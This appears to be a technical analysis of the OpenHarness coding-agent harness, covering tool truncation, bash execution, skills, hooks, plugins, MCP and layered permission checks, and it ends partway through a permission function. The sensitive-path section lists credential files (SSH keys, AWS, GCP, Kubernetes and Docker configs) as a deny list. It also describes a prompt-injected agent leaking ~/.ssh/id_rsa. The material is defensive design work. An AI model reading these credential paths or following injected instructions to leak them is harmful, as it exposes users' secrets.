    async def execute(self, args: BaseModel, ctx: ToolContext) -> ToolResult:
        """Execute tool with validated args; return result or error."""
        ...

# Concrete usage
class ReadInput(BaseModel):
    file_path: str
    offset: int | None = None
    limit: int | None = None

class ReadTool(BaseTool):
    name = "Read"
    description = "Read a file..."
    input_model = ReadInput
    is_read_only = True

    async def execute(self, args: ReadInput, ctx) -> ToolResult:
        ...
```

The is_read_only flag is especially important: the permission checker uses it to decide whether confirmation is needed (read-only tools are always allowed in DEFAULT mode).

Code example (generic):
```python
from pydantic import BaseModel, Field
from abc import ABC, abstractmethod

class BaseTool(ABC):
    name: str
    input_model: type[BaseModel]

    @classmethod
    def schema(cls):
        return {"name": cls.name, "input_schema": cls.input_model.model_json_schema()}

    @abstractmethod
    async def execute(self, args: BaseModel) -> dict: ...

class GrepInput(BaseModel):
    pattern: str = Field(description="regex pattern")
    path: str | None = None

class GrepTool(BaseTool):
    name = "Grep"
    input_model = GrepInput

    async def execute(self, args: GrepInput):
        return await run_ripgrep(args.pattern, args.path)
```
Pros
- Single source of truth for the schema (model_json_schema)
- High-quality Pydantic validation errors
- Every path passes mypy strict
- Field descriptions become LLM-readable documentation
Cons
- The Pydantic v1→v2 jump still causes friction (breaking changes)
- Generated JSON schema can be overly complex (Union types), confusing the model
- No description_template mechanism like opencode's .txt files
- Minor overhead per validation call
T11. Per-tool output truncation + UTF-8 normalization
C.2 · tools/bash_tool.py L129 · tools/web_fetch_tool.py L61 · tools/file_read_tool.py L57 · Limits: bash 12KB, web 50KB, file 200 lines default

Code from OpenHarness:

```python
# tools/bash_tool.py
MAX_BASH_OUTPUT_BYTES = 12 * 1024  # 12KB

def _truncate_output(raw: bytes, limit: int = MAX_BASH_OUTPUT_BYTES) -> str:
    # 1. Decode UTF-8 with replace policy (never raise on bad bytes)
    text = raw.decode("utf-8", errors="replace")
    if len(text) <= limit:
        return text
    # 2. Keep head + tail, drop middle with clear marker
    half = limit // 2
    return (
        text[:half]
        + f"\n\n... [output truncated: {len(text) - limit} bytes omitted] ...\n\n"
        + text[-half:]
    )

# tools/web_fetch_tool.py
MAX_WEB_FETCH_BYTES = 50 * 1024  # 50KB — web pages can be larger

# tools/file_read_tool.py — different strategy: line-based, not byte-based
DEFAULT_READ_LIMIT = 200   # lines
MAX_LINE_LENGTH = 2000     # truncate long lines

def _read_with_limits(path: Path, offset: int, limit: int) -> str:
    lines = []
    with path.open("r", encoding="utf-8", errors="replace") as f:
        for i, line in enumerate(f):
            if i < offset:
                continue
            if i >= offset + limit:
                break
            if len(line) > MAX_LINE_LENGTH:
                line = line[:MAX_LINE_LENGTH] + "... [line truncated]\n"
            lines.append(f"{i+1}\t{line}")
    return "".join(lines)
```

The errors="replace" policy is invariant — it never raises UnicodeDecodeError mid-stream (guarding against a binary file sneaking into the input).

Code example (generic):
```python
def truncate_mid(text: str, limit: int) -> str:
    if len(text) <= limit:
        return text
    half = limit // 2
    dropped = len(text) - limit
    return text[:half] + f"\n... [{dropped} chars truncated] ...\n" + text[-half:]

def safe_decode(raw: bytes) -> str:
    return raw.decode("utf-8", errors="replace")

# Per-tool policy
LIMITS = {"Bash": 12*1024, "WebFetch": 50*1024, "Read": 200}  # line count for Read
```
Pros
- Prevents a single tool call from becoming a context bomb
- Per-tool tuning — reading code differs from reading build logs
- UTF-8 replace → never crashes on binary
- Head+tail for bash — errors are usually at the end, the command at the start
Cons
- 12KB for bash can cut right through the middle of a JSON object
- No "spill to file" like opencode (truncate → file path)
- Limits are hardcoded — not configurable per session
- Line-based limits for Read degrade on files with one extremely long line
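The "spill to file" alternative mentioned in the cons (the opencode approach) can be sketched as follows. This is a hypothetical `truncate_or_spill` helper, not OpenHarness code: instead of dropping the middle, the full output is saved to a temp file whose path is returned in the marker, so the agent can Read/Grep the rest on demand.

```python
import tempfile

def truncate_or_spill(text: str, limit: int) -> str:
    """Hypothetical variant: keep head+tail in context, but persist the
    full output to a temp file and point the marker at its path."""
    if len(text) <= limit:
        return text
    with tempfile.NamedTemporaryFile(
        "w", suffix=".log", delete=False, encoding="utf-8"
    ) as f:
        f.write(text)
        spill_path = f.name
    half = limit // 2
    return (
        text[:half]
        + f"\n... [truncated; full output saved to {spill_path}] ...\n"
        + text[-half:]
    )
```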
T12. Bash interactive preflight + PTY + graceful timeout
C.3 · src/openharness/tools/bash_tool.py · Lines: 145–208 · Timeout: 600s · Terminate grace: 2s

Code from OpenHarness
```python
import pty, os, shlex, signal, asyncio

INTERACTIVE_MARKERS = (
    ("npm create", "--yes"),
    ("npx create", "--yes"),
    ("pnpm create", "--yes"),
    ("yarn create", "--yes"),
    ("bun create", "--yes"),
    ("pip install", "--quiet"),  # may prompt for confirmation
    ...
)

def _preflight_interactive_command(cmd: str) -> str | None:
    """Return error msg if cmd would prompt interactively."""
    tokens = shlex.split(cmd)
    joined = " ".join(tokens).lower()
    for marker, required_flag in INTERACTIVE_MARKERS:
        if marker in joined and required_flag not in joined:
            return f"Command likely requires interaction. Add {required_flag} or equivalent."
    return None

async def run_bash(cmd: str, timeout: float = 600) -> BashResult:
    # 1. Preflight check — reject scaffolds without --yes/--ci
    if err := _preflight_interactive_command(cmd):
        return BashResult(exit_code=2, stderr=err, is_error=True)
    # 2. Allocate PTY so that TTY-detecting programs work (vim -c, ansi colors)
    master_fd, slave_fd = pty.openpty()
    proc = await asyncio.create_subprocess_exec(
        "bash", "-c", cmd,
        stdin=slave_fd, stdout=slave_fd, stderr=slave_fd,  # merge stderr→stdout
        preexec_fn=os.setsid,  # own process group
    )
    # 3. Read from master fd with overall timeout
    output = bytearray()
    try:
        await asyncio.wait_for(_read_pty(master_fd, output), timeout=timeout)
    except asyncio.TimeoutError:
        # 4. Graceful: SIGTERM → wait 2s → SIGKILL
        os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
        try:
            await asyncio.wait_for(proc.wait(), timeout=2.0)
        except asyncio.TimeoutError:
            os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
        return BashResult(exit_code=-1, output=bytes(output), timed_out=True)
    return BashResult(exit_code=proc.returncode, output=bytes(output))
```

Three wins here: (1) `npm create X` without `--yes` is rejected up front — the agent never gets stuck waiting forever for a user confirmation; (2) the PTY lets tools like git, pip, npm run in the right mode (behavior differs between a TTY and a pipe); (3) the process group + graceful terminate kills child processes too, avoiding zombies. The 600s timeout is long, but there is a 2s grace between SIGTERM and SIGKILL.

Code example (generic)
```python
import asyncio, shlex, os, signal, pty

INTERACTIVE = ("npm create", "npx create", "yarn create")

async def safe_bash(cmd: str, timeout=600):
    for m in INTERACTIVE:
        if m in cmd.lower() and "--yes" not in cmd:
            return {"error": f"'{m}' requires --yes to run non-interactively"}
    master, slave = pty.openpty()
    proc = await asyncio.create_subprocess_exec(
        "bash", "-c", cmd,
        stdin=slave, stdout=slave, stderr=slave,
        preexec_fn=os.setsid,
    )
    try:
        await asyncio.wait_for(proc.wait(), timeout)
    except asyncio.TimeoutError:
        os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
        try:
            await asyncio.wait_for(proc.wait(), 2)
        except asyncio.TimeoutError:
            os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
    return {"exit": proc.returncode}
```
Pros
- Preflight catches most scaffold prompts
- PTY makes git/pip/npm output in the correct format
- Process-group kill — zombie-free
- Graceful 2s terminate gives the process a chance to flush stdout
Cons
- INTERACTIVE_MARKERS is incomplete — new tools are easily missed
- PTY doesn't run on Windows (an alternative is needed)
- Stderr merged into stdout — the separate signal is lost
- 600s timeout is far too long for most quick commands
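Since `pty` is POSIX-only (the Windows con above), a portable runner might prefer the PTY when available and fall back to plain pipes otherwise. A sketch with a hypothetical `run_portable` helper, not how OpenHarness handles it:

```python
import asyncio, os

try:
    import pty  # POSIX-only module
except ImportError:  # e.g. Windows
    pty = None

async def run_portable(cmd: str, timeout: float = 60) -> dict:
    """Prefer a PTY so TTY-detecting tools behave as in a terminal;
    fall back to pipes where pty is unavailable (output formatting may
    differ, but the command still runs)."""
    if pty is not None:
        master, slave = pty.openpty()
        proc = await asyncio.create_subprocess_exec(
            "bash", "-c", cmd, stdin=slave, stdout=slave, stderr=slave,
        )
        await asyncio.wait_for(proc.wait(), timeout)
        os.close(slave)              # drop our copy so reads can hit EOF
        os.set_blocking(master, False)
        data = b""
        try:
            while chunk := os.read(master, 4096):
                data += chunk
        except (BlockingIOError, OSError):
            pass                     # buffer drained (EIO once slave side is gone)
        os.close(master)
        return {"exit": proc.returncode, "out": data.decode("utf-8", "replace")}
    # Pipe fallback: works anywhere asyncio subprocesses do
    proc = await asyncio.create_subprocess_shell(
        cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.STDOUT,
    )
    out, _ = await asyncio.wait_for(proc.communicate(), timeout)
    return {"exit": proc.returncode, "out": out.decode("utf-8", "replace")}
```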
T13. Ripgrep-first Glob/Grep với Python fallback
C.4 · tools/glob_tool.py L65–122 · tools/grep_tool.py L37–83

Code from OpenHarness
```python
import asyncio, re, shutil, subprocess, fnmatch
from pathlib import Path

RG_BIN = shutil.which("rg")  # detect at import time

async def glob_files(pattern: str, root: Path, *, respect_gitignore: bool = True) -> list[Path]:
    if RG_BIN:
        # rg --files --glob PATTERN — respects .gitignore by default
        args = [RG_BIN, "--files", "--glob", pattern, str(root)]
        if not respect_gitignore:
            args.insert(1, "--no-ignore")
        # Include hidden files if inside a git repo
        if (root / ".git").is_dir():
            args.insert(1, "--hidden")
        proc = await asyncio.create_subprocess_exec(
            *args, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.DEVNULL
        )
        stdout, _ = await proc.communicate()
        return [Path(line) for line in stdout.decode().splitlines()]
    # --- Python fallback ---
    # Respect .gitignore via pathspec library; else just glob
    results = []
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        if fnmatch.fnmatch(p.name, pattern) or fnmatch.fnmatch(str(p), pattern):
            if respect_gitignore and _is_gitignored(p, root):
                continue
            results.append(p)
    return results

async def grep_content(pattern: str, root: Path, *, case_insensitive=False) -> list[GrepMatch]:
    if RG_BIN:
        args = [RG_BIN, "--json", "--with-filename", pattern, str(root)]
        if case_insensitive:
            args.append("-i")
        ...
    else:
        # Python fallback with re.compile()
        regex = re.compile(pattern, re.IGNORECASE if case_insensitive else 0)
        ...
```

rg respects .gitignore by default. OpenHarness detects rg at import time (`shutil.which`) — use it if present, otherwise fall back to Python. A special case: inside a git repo, `--hidden` is added automatically (to find `.github/`, `.vscode/`). The Python fallback uses `fnmatch` + `rglob` — slow, but dependency-free.

Code example (generic)
```python
import shutil, asyncio
from pathlib import Path

RG = shutil.which("rg")

async def fast_glob(pattern: str, root: Path):
    if RG:
        args = [RG, "--files", "--glob", pattern, str(root)]
        if (root / ".git").is_dir():
            args.insert(1, "--hidden")
        proc = await asyncio.create_subprocess_exec(*args, stdout=asyncio.subprocess.PIPE)
        out, _ = await proc.communicate()
        return [Path(l) for l in out.decode().splitlines()]
    # fallback
    import fnmatch
    return [p for p in root.rglob("*") if p.is_file() and fnmatch.fnmatch(p.name, pattern)]
```
Pros
- 10-100x faster than Python glob on large repos
- .gitignore respected out of the box
- Graceful fallback when rg is absent
- JSON output is easy to parse
Cons
- Hidden-file behavior differs between rg and the Python fallback (inconsistent)
- rg-specific features (PCRE2, multiline) are missing in the Python fallback
- Subprocess overhead for small queries
- Paths with spaces must be quoted carefully
D. Extension Ecosystem — 4 techniques
OpenHarness has four surfaces for extension: skills (markdown), hooks (policy/observability), plugins (bundling skill+hook+mcp), and MCP (external tool servers). All are discovered from the filesystem — a zero-dependency configuration registry.
T14. Markdown-based skill system + frontmatter
D.1 · src/openharness/skills/loader.py · Lines: 27–51 · Scan paths: bundled + ~/.openharness/skills/<skill>/SKILL.md + plugin skills

Code from OpenHarness
```python
import yaml, re
from pathlib import Path
from dataclasses import dataclass

FRONTMATTER_RE = re.compile(r"^---\n(.*?)\n---\n(.*)", re.DOTALL)

@dataclass
class Skill:
    name: str
    description: str
    path: Path
    body: str

def load_skills(cwd: Path) -> list[Skill]:
    skills: list[Skill] = []
    seen_names: set[str] = set()
    for base in _skill_roots(cwd):  # bundled + ~/.openharness/skills + plugins
        if not base.is_dir():
            continue
        for skill_dir in sorted(base.iterdir()):
            manifest = skill_dir / "SKILL.md"
            if not manifest.exists():
                continue
            raw = manifest.read_text(encoding="utf-8")
            match = FRONTMATTER_RE.match(raw)
            if match:
                meta = yaml.safe_load(match.group(1)) or {}
                body = match.group(2).strip()
                name = meta.get("name") or skill_dir.name
                description = meta.get("description", "")
            else:
                # Fallback: derive from first heading + first paragraph
                name = skill_dir.name
                first_heading = re.search(r"^# (.+)$", raw, re.M)
                title = first_heading.group(1) if first_heading else name
                first_para = raw.split("\n\n")[1] if "\n\n" in raw else ""
                description = first_para[:200]
                body = raw
            # Dedup by name, first wins (bundled > user > plugin priority)
            if name in seen_names:
                continue
            seen_names.add(name)
            skills.append(Skill(name=name, description=description, path=manifest, body=body))
    return skills
```

Each skill is a directory containing a SKILL.md whose frontmatter describes it. The system prompt injects the descriptions of all available skills — the LLM reads a description and "activates" a skill when relevant (i.e. it requests a Read of SKILL.md for the full instructions). The design mirrors Claude Code skills. The no-frontmatter fallback makes testing easy (a single SKILL.md file is enough). First-wins priority: built-ins take precedence, then user overrides, plugins last.

Code example (generic)
```python
import yaml, re
from pathlib import Path

def discover_skills(roots: list[Path]):
    skills = []; seen = set()
    for root in roots:
        if not root.is_dir():
            continue
        for d in sorted(root.iterdir()):
            mf = d / "SKILL.md"
            if not mf.exists():
                continue
            raw = mf.read_text()
            m = re.match(r"^---\n(.*?)\n---\n(.*)", raw, re.DOTALL)
            meta, body = (yaml.safe_load(m.group(1)), m.group(2)) if m else ({}, raw)
            name = meta.get("name", d.name)
            if name in seen:
                continue  # first-wins
            seen.add(name)
            skills.append({"name": name, "description": meta.get("description", ""), "body": body})
    return skills
```
Pros
- User-friendly — markdown is all you need to know
- Git-friendly — easy to diff/review
- Frontmatter is machine-readable, the body human-readable
- Layered priority (builtin/user/plugin)
Cons
- Large skills cost tokens when the LLM loads the body
- No versioning / dependencies between skills
- Priority can surprise (first-wins is hard to debug with many plugins)
- The fallback parse is unpredictable when headings are non-standard
→ Deep dive T14: Markdown-based skill system + frontmatter discovery
T15. Hook lifecycle system (6 events · 4 types · hot reload)
D.2 · src/openharness/hooks/events.py, hooks/executor.py · Reloader: HookReloader watches mtime

Code from OpenHarness
```python
from enum import Enum

class HookEvent(Enum):
    SESSION_START = "session_start"
    SESSION_END = "session_end"
    PRE_COMPACT = "pre_compact"
    POST_COMPACT = "post_compact"
    PRE_TOOL_USE = "pre_tool_use"
    POST_TOOL_USE = "post_tool_use"

class HookType(Enum):
    COMMAND = "command"  # exec shell command, check exit code
    PROMPT = "prompt"    # LLM judges payload vs policy
    HTTP = "http"        # POST payload to webhook
    AGENT = "agent"      # spawn subagent for decision

class HookExecutor:
    async def execute(self, event: HookEvent, payload: dict) -> HookResult:
        self._maybe_reload()  # hot-reload when files changed
        blocked, reasons = False, []
        for hook in self._hooks_for(event):
            res = await hook.run(payload)
            reasons.append(res.message)
            if res.blocked:
                blocked = True
                if hook.type == HookType.COMMAND:
                    break  # short-circuit for command hooks
        return HookResult(blocked=blocked, reason="; ".join(reasons))

class HookReloader:
    """Watch hook file mtime; reload config when modified."""
    def maybe_reload(self):
        for path, old_mtime in list(self._mtimes.items()):
            new_mtime = path.stat().st_mtime
            if new_mtime != old_mtime:
                log.info("reloading hooks from %s", path)
                self._hooks = self._parse(path)
                self._mtimes[path] = new_mtime
```

Edits to hooks.yaml take effect without restarting the session.

Code example (generic)
```python
import asyncio, json
from enum import Enum

class HookEvent(Enum):
    PRE_TOOL = "pre_tool"; POST_TOOL = "post_tool"

class CommandHook:
    def __init__(self, cmd):
        self.cmd = cmd
    async def run(self, payload):
        proc = await asyncio.create_subprocess_shell(
            self.cmd,
            stdin=asyncio.subprocess.PIPE,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
        out, err = await proc.communicate(json.dumps(payload).encode())
        return {"blocked": proc.returncode != 0, "reason": err.decode()}

class HookExecutor:
    def __init__(self, hooks_by_event):
        self.hooks = hooks_by_event
    async def fire(self, event, payload):
        for h in self.hooks.get(event, []):
            r = await h.run(payload)
            if r["blocked"]:
                return r
        return {"blocked": False}
```
Pros
- 6 lifecycle events cover compaction + tools + session
- Hot reload — no session restart
- 4 hook types — flexible (simple → sophisticated)
- Short-circuit for command hooks — perf-friendly
Cons
- LLM-based prompt hooks cost an API call — latency + cost
- Hot reload can race with a hook that is mid-run
- No "chain" semantics — each hook is independent
- An agent hook can recursively call back into the main agent
→ Deep dive T15: Hook lifecycle system (6 events · 4 types · hot reload)
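A minimal runnable version of the mtime-based hot reload (the same idea as `HookReloader` above, with hypothetical names): a cheap `stat()` before each use, no file-watcher dependency.

```python
from pathlib import Path

class MtimeReloader:
    """Re-parse a config file whenever its mtime changes."""
    def __init__(self, path: Path, parse):
        self.path = path
        self.parse = parse   # callable: raw text -> config object
        self.mtime = None
        self.config = None

    def get(self):
        mtime = self.path.stat().st_mtime
        if mtime != self.mtime:  # first call, or file modified since
            self.config = self.parse(self.path.read_text())
            self.mtime = mtime
        return self.config
```

The trade-off (as the cons note) is that a hook already running keeps its old config; only the next `get()` sees the new one.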
T16. Plugin manifest-based loading
D.3 · src/openharness/plugins/loader.py · Lines: 104–157 · Paths: ~/.openharness/plugins/ (user) + .openharness/plugins/ (project)

Code from OpenHarness
```python
import yaml
from pathlib import Path
from dataclasses import dataclass, field

@dataclass
class PluginManifest:
    name: str
    version: str
    description: str
    skills_dir: str | None = None    # relative path to skills/
    hooks_file: str | None = None    # relative path to hooks.yaml
    mcp_file: str | None = None      # relative path to mcp.json
    commands_dir: str | None = None  # relative path to commands/

def load_plugins(cwd: Path) -> list[Plugin]:
    plugins = []
    roots = [
        Path.home() / ".openharness" / "plugins",
        cwd / ".openharness" / "plugins",
    ]
    for root in roots:
        if not root.is_dir():
            continue
        for plugin_dir in sorted(root.iterdir()):
            manifest_path = plugin_dir / "plugin.yaml"
            if not manifest_path.exists():
                continue
            data = yaml.safe_load(manifest_path.read_text())
            manifest = PluginManifest(**data)
            # Resolve relative paths to absolute
            skills = []
            if manifest.skills_dir:
                skills_path = plugin_dir / manifest.skills_dir
                skills = _load_skills_from(skills_path)
            hooks = []
            if manifest.hooks_file:
                hooks_path = plugin_dir / manifest.hooks_file
                hooks = _parse_hooks_yaml(hooks_path)
            mcp_servers = []
            if manifest.mcp_file:
                mcp_path = plugin_dir / manifest.mcp_file
                mcp_servers = _parse_mcp_json(mcp_path)
            commands = []
            if manifest.commands_dir:
                # Namespace: "plugin:<plugin_name>:<file_stem>"
                commands_path = plugin_dir / manifest.commands_dir
                for cmd_file in sorted(commands_path.glob("*.md")):
                    commands.append(Command(
                        name=f"plugin:{manifest.name}:{cmd_file.stem}",
                        body=cmd_file.read_text(),
                    ))
            plugins.append(Plugin(
                manifest=manifest,
                skills=skills,
                hooks=hooks,
                mcp_servers=mcp_servers,
                commands=commands,
            ))
    return plugins
```

plugin.yaml only lists relative paths — it embeds no content. Commands are namespaced `plugin:<name>:<file>` to avoid conflicts. Two roots: user global + project local — project overrides user. This is the familiar Claude Code plugin pattern, ported to Python.

Code example (generic)
```python
import yaml
from pathlib import Path

def load_plugins(roots: list[Path]) -> list:
    out = []
    for root in roots:
        if not root.is_dir():
            continue
        for d in sorted(root.glob("*")):
            mf = d / "plugin.yaml"
            if not mf.exists():
                continue
            data = yaml.safe_load(mf.read_text())
            plugin = {
                "name": data["name"],
                "root": d,
                "skills": load_skills_dir(d / data.get("skills_dir", "skills")),
                "hooks": load_hooks(d / data["hooks_file"]) if data.get("hooks_file") else [],
                "mcp": load_mcp(d / data["mcp_file"]) if data.get("mcp_file") else [],
            }
            out.append(plugin)
    return out
```
Pros
- A single manifest declares everything
- Bundles skills + hooks + MCP coherently
- Namespacing avoids command conflicts
- Distributable via git / the filesystem
Cons
- No semver / dependency resolution
- Security: a plugin hook can exec arbitrary shell
- No signing / verification
- Rigid bundle layout (fixed skills_dir name)
T17. MCP stdio + HTTP transport + dynamic Pydantic adapter
D.4 · src/openharness/mcp/client.py · Lines: 29–95 · Aggregator: McpClientManager uses AsyncExitStack

Code from OpenHarness
```python
from contextlib import AsyncExitStack
from mcp import ClientSession, StdioServerParameters
from mcp.client.stdio import stdio_client
from mcp.client.sse import sse_client
from pydantic import create_model

class McpClientManager:
    def __init__(self, server_configs):
        self._configs = server_configs
        self._stack: AsyncExitStack | None = None
        self._sessions: dict[str, ClientSession] = {}
        self._tools: list[McpTool] = []

    async def __aenter__(self):
        self._stack = AsyncExitStack()
        await self._stack.__aenter__()
        for name, cfg in self._configs.items():
            if cfg.transport == "stdio":
                params = StdioServerParameters(command=cfg.command, args=cfg.args, env=cfg.env)
                stream_ctx = stdio_client(params)
            elif cfg.transport == "http":
                stream_ctx = sse_client(cfg.url, headers=cfg.headers)
            else:
                raise ValueError(f"Unknown MCP transport: {cfg.transport}")
            streams = await self._stack.enter_async_context(stream_ctx)
            session = ClientSession(*streams)
            await self._stack.enter_async_context(session)
            await session.initialize()
            self._sessions[name] = session
            # Discover tools + build Pydantic adapter for each
            resp = await session.list_tools()
            for tool in resp.tools:
                InputModel = _build_pydantic_from_schema(tool.inputSchema, name=tool.name)
                self._tools.append(McpTool(
                    server=name,
                    name=f"mcp__{name}__{tool.name}",  # namespaced tool id
                    description=tool.description,
                    input_model=InputModel,
                    session=session,
                ))
        return self

    async def __aexit__(self, *exc):
        if self._stack:
            await self._stack.__aexit__(*exc)

def _build_pydantic_from_schema(schema: dict, *, name: str):
    """Convert JSON schema to a dynamic Pydantic model."""
    fields = {}
    for prop, spec in schema.get("properties", {}).items():
        py_type = _json_type_to_python(spec.get("type", "string"))
        fields[prop] = (py_type, ...)  # required
    return create_model(f"Mcp_{name}_Input", **fields)
```

The shared AsyncExitStack guarantees correct per-server cleanup even when one server fails init. `create_model` builds a Pydantic model from the JSON schema at runtime — an MCP tool gets validated just like a native tool. The `mcp__<server>__<tool>` namespace avoids conflicts between servers sharing a tool name. Dual transport stdio+HTTP covers both local subprocesses and remote SaaS MCP.

Code example (generic)
```python
from contextlib import AsyncExitStack
from pydantic import create_model

class McpManager:
    async def __aenter__(self):
        self.stack = await AsyncExitStack().__aenter__()
        self.sessions = {}
        self.tools = []
        for name, cfg in self.configs.items():
            ctx = stdio_client(cfg) if cfg.transport == "stdio" else sse_client(cfg)
            streams = await self.stack.enter_async_context(ctx)
            sess = await self.stack.enter_async_context(ClientSession(*streams))
            await sess.initialize()
            for t in (await sess.list_tools()).tools:
                self.tools.append({"name": f"mcp__{name}__{t.name}",
                                   "model": create_model(f"M_{t.name}", **...)})
        return self
```
Pros
- Dual transport — stdio (local) + HTTP (remote)
- AsyncExitStack → safe nested cleanup
- Dynamic Pydantic — MCP tools validated like natives
- Namespacing avoids conflicts
Cons
- JSON schema → Pydantic conversion doesn't yet handle complex allOf/oneOf
- One stuck server blocks the whole init (no per-server timeout)
- SSE transport has no built-in retry
- Schema conversion doesn't support descriptions for enum values
→ Deep dive T17: MCP stdio + HTTP transport + dynamic Pydantic adapter
E. Permission & Safety — 4 techniques
OpenHarness's permission model combines 3 modes + built-in sensitive path protection + 6-layer hierarchical evaluation + async interactive approval. This is where OpenHarness is more careful than opencode: sensitive path protection cannot be overridden, even in FULL_AUTO.
T18. 3-mode permission system (DEFAULT / PLAN / FULL_AUTO)
E.1 · src/openharness/permissions/modes.py · Constants: PermissionMode.DEFAULT / PLAN / FULL_AUTO

Code from OpenHarness
```python
from enum import Enum

class PermissionMode(Enum):
    DEFAULT = "default"      # read OK; write & mutation need confirm
    PLAN = "plan"            # only read; block all mutations (even bash read-only)
    FULL_AUTO = "full_auto"  # everything OK (except sensitive paths)

# Used in PermissionChecker.evaluate() — see T20
if self._settings.mode == PermissionMode.FULL_AUTO:
    return PermissionDecision(allowed=True, reason="Auto mode allows all tools")
if is_read_only:
    return PermissionDecision(allowed=True, reason="read-only tools are allowed")
if self._settings.mode == PermissionMode.PLAN:
    return PermissionDecision(
        allowed=False,
        reason="Plan mode blocks mutating tools until the user exits plan mode",
    )
# DEFAULT: require confirmation for mutating tools
return PermissionDecision(
    allowed=False,
    requires_confirmation=True,
    reason="Mutating tools require user confirmation in default mode. ...",
)
```

Code example (generic)
```python
from enum import Enum

class Mode(Enum):
    DEFAULT = "default"; PLAN = "plan"; FULL_AUTO = "full_auto"

def decide(mode: Mode, is_read_only: bool) -> str:
    if mode == Mode.FULL_AUTO:
        return "allow"
    if is_read_only:
        return "allow"
    if mode == Mode.PLAN:
        return "deny"
    return "confirm"  # DEFAULT needs user approval
```
Pros
- 3 modes cover trivial → unattended workflows
- Mode is decoupled from approval → the checker stays a pure function
- PLAN is especially useful as a "research mode"
- User intent is explicit — no config editing needed
Cons
- 3 modes aren't granular enough (e.g. "allow bash, confirm edit")
- FULL_AUTO can be abused on production systems
- PLAN blocks read-only bash (git status) if the tool self-declares as mutating
- Mode toggles don't persist per project
→ Deep dive T18: 3-mode permission system (DEFAULT / PLAN / FULL_AUTO)
T19. Built-in sensitive path protection (hardcoded glob)
E.2 · src/openharness/permissions/checker.py · Lines: 14–37 · Patterns: 10+ hardcoded

Code from OpenHarness
```python
# Paths that are always denied regardless of permission mode or user config.
# These protect high-value credential and key material from LLM-directed access
# (including via prompt injection). Patterns use fnmatch syntax and are matched
# against the fully-resolved absolute path produced by the query engine.
SENSITIVE_PATH_PATTERNS: tuple[str, ...] = (
    # SSH keys and config
    "*/.ssh/*",
    # AWS credentials
    "*/.aws/credentials",
    "*/.aws/config",
    # GCP credentials
    "*/.config/gcloud/*",
    # Azure credentials
    "*/.azure/*",
    # GPG keys
    "*/.gnupg/*",
    # Docker credentials
    "*/.docker/config.json",
    # Kubernetes credentials
    "*/.kube/config",
    # OpenHarness own credential stores
    "*/.openharness/credentials.json",
    "*/.openharness/copilot_auth.json",
)

def evaluate(self, tool_name, *, is_read_only, file_path=None, command=None):
    # Sensitive path check runs FIRST, cannot be overridden
    if file_path:
        for candidate in _policy_match_paths(file_path):
            for pattern in SENSITIVE_PATH_PATTERNS:
                if fnmatch.fnmatch(candidate, pattern):
                    return PermissionDecision(
                        allowed=False,
                        reason=f"Access denied: {file_path} is a sensitive credential path"
                    )
    # ... rest of evaluation ...
```

The threat model: a prompt-injected agent reads `~/.ssh/id_rsa` and pastes it into a response. OpenHarness places the sensitive path check outside the permission mode — even FULL_AUTO cannot bypass it. 10+ patterns cover SSH/AWS/GCP/Azure/GPG/Docker/K8s/its own credentials. fnmatch instead of regex keeps the patterns simple (`*/` wildcards), with no special escaping.

Code example (generic)
```python
import fnmatch
from pathlib import Path

SENSITIVE = (
    "*/.ssh/*", "*/.aws/credentials", "*/.gnupg/*",
    "*/.kube/config", "*/.azure/*", "*/.docker/config.json",
)

def is_sensitive_path(path: str) -> bool:
    # Match against both "dir" and "dir/" to catch directory roots
    normalized = path.rstrip("/")
    candidates = (normalized, normalized + "/")
    return any(fnmatch.fnmatch(c, pat) for c in candidates for pat in SENSITIVE)

def check_permission(path, mode):
    if is_sensitive_path(path):
        return {"allowed": False, "reason": f"{path} is sensitive"}
    # ... other checks by mode ...
```
Pros
- Defence in depth against prompt injection
- Cannot be bypassed by mode / config
- Covers the standard, well-known credential paths
- fnmatch patterns — easy to audit
Cons
- Hardcoded list — needs updating when new cloud providers appear
- Doesn't cover custom credential locations (~/.company-secrets/)
- False positives: legitimate debugging of ~/.ssh/config
- Doesn't protect Windows paths (%USERPROFILE%\.ssh\)
→ Deep dive T19: Built-in sensitive path protection (hardcoded glob)
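The last two cons (custom locations, Windows paths) could be addressed by normalizing separators and accepting user-supplied deny globs. A sketch with a hypothetical `is_sensitive` helper and `extra_patterns` parameter, not an OpenHarness feature:

```python
import fnmatch

BUILTIN = ("*/.ssh/*", "*/.aws/credentials", "*/.gnupg/*")

def is_sensitive(path: str, extra_patterns: tuple[str, ...] = ()) -> bool:
    """Normalize Windows backslashes so %USERPROFILE%\\.ssh\\... hits the
    same POSIX-style fnmatch patterns, and let users append their own
    deny globs (e.g. "*/.company-secrets/*")."""
    normalized = path.replace("\\", "/").rstrip("/")
    candidates = (normalized, normalized + "/")
    patterns = BUILTIN + tuple(extra_patterns)
    return any(fnmatch.fnmatch(c, p) for c in candidates for p in patterns)
```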
T20. 6-layer hierarchical permission evaluation + path normalization
E.3 · src/openharness/permissions/checker.py · Function: evaluate() · Lines: 75–169

Code from OpenHarness
```python
def evaluate(self, tool_name, *, is_read_only, file_path=None, command=None):
    # Layer 1: sensitive path protection (see T19)
    if file_path:
        for candidate in _policy_match_paths(file_path):
            for pattern in SENSITIVE_PATH_PATTERNS:
                if fnmatch.fnmatch(candidate, pattern):
                    return PermissionDecision(allowed=False, reason="sensitive")
    # Layer 2: explicit tool deny list
    if tool_name in self._settings.denied_tools:
        return PermissionDecision(allowed=False, reason=f"{tool_name} is explicitly denied")
    # Layer 3: explicit tool allow list
    if tool_name in self._settings.allowed_tools:
        return PermissionDecision(allowed=True, reason=f"{tool_name} is explicitly allowed")
    # Layer 4: path rules (glob-based)
    if file_path and self._path_rules:
        for candidate in _policy_match_paths(file_path):
            for rule in self._path_rules:
                if fnmatch.fnmatch(candidate, rule.pattern):
                    if not rule.allow:
                        return PermissionDecision(allowed=False, reason=f"deny rule: {rule.pattern}")
    # Layer 5: command deny patterns (bash-specific)
    if command:
        for pattern in getattr(self._settings, "denied_commands", []):
            if isinstance(pattern, str) and fnmatch.fnmatch(command, pattern):
                return PermissionDecision(allowed=False, reason=f"cmd deny: {pattern}")
